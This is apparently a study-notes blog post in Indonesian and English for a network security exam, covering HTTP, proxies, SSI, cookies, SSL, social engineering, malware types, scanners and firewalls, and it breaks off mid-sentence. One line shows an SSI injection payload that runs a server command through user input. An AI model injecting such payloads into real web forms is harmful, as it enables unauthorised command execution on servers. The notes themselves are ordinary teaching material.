Materi UAS SEMESTER 5 KEAMANAN JARINGAN

<div dir="ltr" style="text-align: left;" trbidi="on"> <div align="center" class="MsoNormal" style="text-align: center;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 26.0pt; line-height: 115%;">Web Communication and Security<o:p></o:p></span></div> <div align="center" class="MsoNormal" style="text-align: center;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 26.0pt; line-height: 115%;"><br /></span></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">A Brief Introduction to Web Communications</span></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Hypertext Transfer Protocol</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Protokol HTTP adalah berorientasi transaksi. Klien membuat permintaan dan server mengirim respon.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Protokol ini stateless, dalam bahwa setelah server merespon permintaan, umumnya lupa semua tentang hal itu.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Jika klien membuat permintaan lain beberapa waktu kemudian, tidak ada cara otomatis untuk server untuk mengasosiasikan mereka dengan setiap sesi tertentu.</span></li> </ul> <br /> <div class="MsoListParagraphCxSpLast" style="mso-list: l4 level1 lfo1; text-indent: -18.0pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; line-height: 115%;"><br /></span></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">HTTP METHOD<o:p></o:p></span></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Metode yang paling umum adalah GET, yang berarti bahwa klien mengirimkan permintaan sederhana untuk objek bernama.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Metode yang paling umum kedua adalah POST, yang menentukan bahwa klien mengharapkan untuk mengirim beberapa data ke server, mungkin dalam menanggapi setelah mengisi formulir dan menekan tombol submit.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">KEPALA seperti GET, kecuali bukannya kembali obyek itu sendiri, server diharapkan kembali hanya header dan melewatkan data aktuaL.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; text-indent: -18pt;">Klien menggunakan PUT ketika mereka harus meng-upload file ke server Web, seperti ketika penerbitan halaman Web baru atau mengirim lampiran dengan layanan Web-based e-mail.</span></li> </ul> <br /> <div class="MsoListParagraphCxSpLast" style="mso-list: l12 level1 lfo2; text-indent: -18.0pt;"> <span style="font-family: "Century Gothic","sans-serif"; mso-bidi-font-family: Calibri;"><br /></span></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">Status Code<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin: 0cm 0cm 13.85pt 35.45pt; text-indent: -14.15pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt;"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">200 : "Semuanya OK, di sini adalah dokumen yang Anda minta"<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 13.85pt 35.45pt; text-indent: -14.15pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Wingdings 2";"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">401 : Pemohon tidak berwenang untuk menerima sumber daya<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 35.45pt; text-indent: -14.15pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Wingdings 2";"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">404 : Dokumen yang diminta tidak dapat ditemukan<o:p></o:p></span></div> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;">Melihat data transaksi Raw</span></div> <div class="Default"> <span style="color: windowtext;"><br /></span></div> <div class="Default"> <span style="color: windowtext;">Ini mungkin menjadi sumber informasi yang menarik bagi penyerang</span></div> <div class="Default"> </div> <ul style="text-align: left;"> <li><span style="color: windowtext; text-indent: -18pt;">Authentication informasi</span></li> <li><span style="text-indent: -18pt;">Header, yang biasanya mengandung banyak informasi tentang sistem yang dihasilkan mereka.</span></li> </ul> <br /> <div class="Default"> <br /></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%; mso-bidi-font-weight: bold;">HTTP Proxies<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Sebuah Proxy HTTP adalah server yang bertindak sebagai perantara dalam komunikasi antara HTTP klien dan server.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Alih-alih menghubungkan langsung ke server yang bersangkutan, klien mengirim permintaan ke proxy, yang pada gilirannya menghubungkan ke server dan membuat permintaan atas nama klien. Mereka juga mengurus meneruskan respon server kembali ke klien.</span></li> </ul> <br /> <div class="MsoNormal" style="margin-bottom: 10.05pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; mso-bidi-font-family: "Century Gothic";">Type dari proxi<o:p></o:p></span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMcRG-PwF4e_XlUNNVMFMtzsT0u4-7_W2rwNM02NepAjWOy5IAq9Q3lW55W5NfzcJ-m3cnzkiawCfUVes3ZTpfqFKH2doOow0KVdTrwqKOwjECEGGRZfpSatqfxF35_InaroLwJIipriI/s1600/Untitled11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMcRG-PwF4e_XlUNNVMFMtzsT0u4-7_W2rwNM02NepAjWOy5IAq9Q3lW55W5NfzcJ-m3cnzkiawCfUVes3ZTpfqFKH2doOow0KVdTrwqKOwjECEGGRZfpSatqfxF35_InaroLwJIipriI/s1600/Untitled11.jpg" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGmmMJ7uoBwq7tt0THIlJjF_NL61pwYVvgK5CmrLsmwo8FaDqfJmajpT1bubjdq2dmsnzfmxlcfGOKctwlSr57mnAVrJI3CRyqJUlFe8pTZMgvycZLZmqD2N2TeIOHz353N_SHTXVmpaU/s1600/Untitled112.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGmmMJ7uoBwq7tt0THIlJjF_NL61pwYVvgK5CmrLsmwo8FaDqfJmajpT1bubjdq2dmsnzfmxlcfGOKctwlSr57mnAVrJI3CRyqJUlFe8pTZMgvycZLZmqD2N2TeIOHz353N_SHTXVmpaU/s1600/Untitled112.jpg" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="Default"> <span style="color: windowtext; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">Berbeda dengan proxy ke depan, di mana proxy dekat ke pengguna akhir, penyedia konten mengelola reverse proxy. Alih-alih iklan URL dari server Web mereka secara langsung, penyedia konten memberikan alamat proxy mereka.<o:p></o:p></span></div> <div class="Default"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt;"> </span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Open proxy</span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Sebuah permintaan proxy forwarding terbuka dari dan ke mana saja di Internet. Proxy terbuka adalah forwarding server proxy yang dapat diakses oleh setiap pengguna Internet.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Sebuah open proxy anonim memungkinkan pengguna untuk menyembunyikan alamat IP mereka saat browsing Web atau menggunakan layanan Internet lainnya.</span></li> </ul> <br /> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">TUJUAN</span></div> <div class="Default"> </div> <ul style="text-align: left;"> <li><span style="color: windowtext; text-indent: -18pt;">Sebuah server proxy memiliki berbagai macam tujuan potensial, termasuk:</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Untuk menjaga mesin di balik itu anonim, terutama untuk keamanan</span></li> <li><span style="color: windowtext; font-family: 'Wingdings 2'; text-indent: -18pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="color: windowtext; text-indent: -18pt;">Untuk mempercepat akses ke sumber daya (menggunakan cache). Web proxy biasanya digunakan untuk cache halaman web dari web server</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Untuk menerapkan kebijakan akses ke layanan jaringan atau konten, misalnya untuk memblokir situs yang tidak diinginkan.</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Untuk log / penggunaan audit, yaitu untuk menyediakan perusahaan karyawan pelaporan penggunaan Internet.</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Untuk mengakses situs yang dilarang atau disaring oleh ISP atau lembaga.</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Untuk memotong keamanan / kontrol orangtua.</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Untuk menghindari internet filtering untuk mengakses konten lain diblokir oleh pemerintah.</span></li> </ul> <br /> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">HTML Security <o:p></o:p></span></div> <div class="Default" style="margin-bottom: 13.85pt; margin-left: 49.65pt; margin-right: 0cm; margin-top: 0cm; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Reading HTML Source</span></div> <div class="Default" style="margin-bottom: 13.85pt; margin-left: 49.65pt; margin-right: 0cm; margin-top: 0cm; text-indent: -21.3pt;"> </div> <ul style="text-align: left;"> <li><span style="color: windowtext; text-indent: -18pt;">Hidden Fields, yang diberi nama potongan informasi terkubur dalam kode HTML untuk formulir, tetapi yang tidak pernah ditampilkan kepada pengguna</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Server Side Termasuk, tag HTML khusus ditafsirkan oleh server Web pada saat file tersebut dikirim ke klien.</span></li> </ul> <div class="Default"> <br /></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">Server Side Includes (SSI)</span></div> <div class="MsoNormal"> <span style="color: windowtext; text-indent: -21.3pt;"><br /></span></div> <div class="MsoNormal"> <span style="color: windowtext; text-indent: -21.3pt;">Dengan menggunakan SSI, Anda dapat membuat halaman yang dapat mencakup file lainnya dari server, program CGI dijalankan, atau mungkin yang paling berbahaya, menjalankan perintah sewenang-wenang pada server Web dan masukkan output mereka ke halaman.</span></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;"><br /></span></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">Commands used to inject SSI<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">It can be exploited through manipulation of SSI in use in the application or </span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">force its use through user input fields</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">List files of directory</span></li> <li><span style="font-family: 'Wingdings 2'; font-size: 12pt; text-indent: -18pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">< !--#exec cmd="dir" --></span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">To show current document filename:</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;"><!--#echo var="DOCUMENT_NAME" --></span></li> </ul> <br /> <div class="MsoListParagraphCxSpLast" style="margin: 0cm 0cm 0.0001pt 46.35pt;"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; mso-bidi-font-family: "Century Gothic";">Cookies<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">    HTTP is “stateless” - no context information<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">    Cookies provide “state” and context<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">    Can only hold information given to the browser by the server<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">    Can only be exchanged with originating server or domain<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">    Can block cookies if desired<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <br /></div> <div class="Default"> <br /></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 21.3pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt;">Web Security Protocol - SSL</span><span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; mso-bidi-font-family: "Century Gothic";"><o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt;"> </span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Protokol untuk mengenkripsi lalu lintas jaringan</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Beroperasi pada Transport Layer</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Operates on port 443</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">How it works</span></li> </ul> <br /> <div class="MsoListParagraphCxSpMiddle" style="margin-bottom: 8.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Client connects to server<o:p></o:p></span></div> <div class="MsoListParagraphCxSpMiddle" style="margin-bottom: 8.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Server indicates need for SSL <o:p></o:p></span></div> <div class="MsoListParagraphCxSpMiddle" style="margin-bottom: 8.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Client and server exchange crypto keys <o:p></o:p></span></div> <div class="MsoListParagraphCxSpMiddle" style="margin-bottom: 8.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Secure session begins</span></div> <div class="MsoListParagraphCxSpMiddle" style="margin-bottom: 8.65pt;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Not a guarantee of security</span></li> </ul> <br /> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <br /></div> <div class="Default"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; mso-bidi-font-style: italic; mso-bidi-font-weight: bold;">Certificate-Based Authentication<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt;"> </span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Mungkin yang paling aman dari semua mekanisme otentikasi umum</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Sertifikat Server (Client dan sertifikat</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Otentikasi berbasis sertifikat memiliki beberapa keuntungan nyata atas protokol lain.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Pertama, password tidak perlu menyeberangi jaringan seperti dengan auth dasar,</span></li> <li><span style="font-family: 'Wingdings 2'; font-size: 12pt; text-indent: -18pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Kedua, server tidak perlu tahu password user, seperti dengan baik dasar dan otentikasi.</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; text-indent: -18pt;">Menggunakan sertifikat memenuhi syarat sebagai otentikasi dua faktor.</span></li> </ul> <br /> <div class="Default"> <br /></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">Secure Electronic Transactions</span></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Dikembangkan oleh Visa, MasterCard, Microsoft, Netscape</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">protokol khusus-tujuan</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -18pt;">Mengamankan transaksi kartu kredit dan debit</span></li> </ul> <br /> <div class="MsoNormal" style="margin-left: 31.65pt;"> <br /></div> <div class="MsoNormal" style="margin-left: 31.65pt;"> <br /></div> <div class="MsoNormal" style="margin-left: 31.65pt;"> <br /></div> <div class="MsoNormal" style="margin-left: 31.65pt;"> <br /></div> <div align="center" class="MsoNormal" style="margin-left: 31.65pt; text-align: center;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 26.0pt; line-height: 115%;">Vulnerability Scanning<o:p></o:p></span></div> <div align="center" class="MsoNormal" style="margin-left: 31.65pt; text-align: center;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 26.0pt; line-height: 115%;"><br /></span></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">Social Engineering</span></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Attempt to manipulate or trick a person into providing information or access</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Bypass network security by exploiting </span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">human vulnerabilities</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Vector is often outside attack by </span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">telephone or a visitor inside your facility</span></li> <li><span style="font-family: 'Wingdings 2'; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Human-based</span></li> </ul> <br /> <div class="MsoListParagraphCxSpMiddle" style="margin-left: 49.65pt; mso-add-space: auto;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; line-height: 115%;">- Urgency<o:p></o:p></span></div> <div class="MsoListParagraphCxSpMiddle" style="margin-left: 49.65pt; mso-add-space: auto;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; line-height: 115%;">- Third-person authorization</span></div> <div class="MsoListParagraphCxSpMiddle" style="margin-left: 49.65pt; mso-add-space: auto;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Computer-based</span></li> </ul> <br /> <div class="MsoListParagraphCxSpMiddle" style="margin-left: 49.65pt; mso-add-space: auto;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; line-height: 115%;">- Popup windows<o:p></o:p></span></div> <div class="MsoListParagraphCxSpLast" style="margin-left: 49.65pt; mso-add-space: auto;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; line-height: 115%;">- Mail attachments<o:p></o:p></span></div> <div class="MsoListParagraphCxSpLast" style="margin-left: 49.65pt; mso-add-space: auto;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; line-height: 115%;"><br /></span></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">Tools that may be Visiting Your DMZ</span></div> <div class="MsoNormal"> <br /></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Virus</span></li> </ul> <br /> <div class="MsoNormal"> <span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%;">Virus adalah program yang mengubah bagaimana komputer bekerja (termasuk kerusakan komputer) dan dapat mereplikasi diri.</span></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Worms</span></li> </ul> <br /> <div class="MsoNormal"> <span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%;">Sebuah worm adalah sebuah program komputer yang memiliki kemampuan untuk menyalin diri dari mesin ke mesin.</span></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Trojans</span></li> </ul> <br /> <div class="MsoNormal"> <span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%;">Sebuah Trojan horse, atau Trojan, adalah aplikasi berbahaya yang menyamar sebagai file yang sah atau membantu program yang nyata, tetapi yang tujuannya adalah, misalnya, untuk memberikan hacker akses tidak sah ke komputer.</span></div> <div class="MsoNormal"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Op</span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">en share scanners</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Jackal, Queso, and SYN/FIN</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">Nmap</span></li> </ul> <br /> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;"><br /></span></div> <div class="MsoNormal"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">TTL<o:p></o:p></span></div> <div class="Default"> <span style="color: windowtext; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">Dalam catatan halaman adalah Time To Live fields dari jejak di slide sebelumnya. Perhatikan bagaimana mereka mengelompok di sekitar 120. Hal ini tidak diharapkan perilaku. Hal ini juga tetap dalam rilis Nmap 2.08 yang memiliki fungsi umpan sehingga TTLs umpan acak.</span><span style="color: windowtext;"><o:p></o:p></span></div> <div class="Default"> <br /></div> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">Hping v2.0 - hping Enhanced<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt;"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">Uses hping crafted packets to: <o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Test firewall rules <o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Test net performance <o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Remotely fingerprint OSes <o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Audit TCP/IP stacks <o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">- Transfer files across a firewall <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;">- Check if a host is up</span><span style="color: windowtext; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;"><o:p></o:p></span></div> <div class="MsoNormal"> <br /></div> <div class="Default"> <br /></div> <div align="center" class="Default" style="text-align: center;"> <span style="color: windowtext; font-size: 26.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">Firewall<o:p></o:p></span></div> <div align="center" class="Default" style="text-align: center;"> </div> <ul> <li style="text-align: left;"><span style="color: windowtext; text-align: left; text-indent: -21.3pt;">Firewall adalah sarana untuk mengontrol apa yang diperbolehkan di beberapa titik dalam jaringa sebagai mekanisme untuk menegakkan kebijakan.</span></li> <li><span style="color: windowtext; text-align: left; text-indent: -21.3pt;">Dibutuhkan namanya dari firewall yang dimaksudkan untuk mencegah penyebaran api dari satu bagian struktur yang lain dalam bangunan.</span></li> </ul> <br /> <div class="MsoNormal" style="margin-left: 2.0cm; text-indent: -1.0cm;"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <span style="font-family: 'Century Gothic', sans-serif; font-size: 16pt;">KENAPA ADA FIREWAL<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin: 0cm 0cm 13.85pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt;"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">Mengurangi resiko dengan melindungi sistem dari upaya untuk mengeksploitasi kelemahan<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 13.85pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Wingdings 2";"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">Meningkatkan privasi - membuat lebih sulit untuk mengumpulkan data intelijen tentang 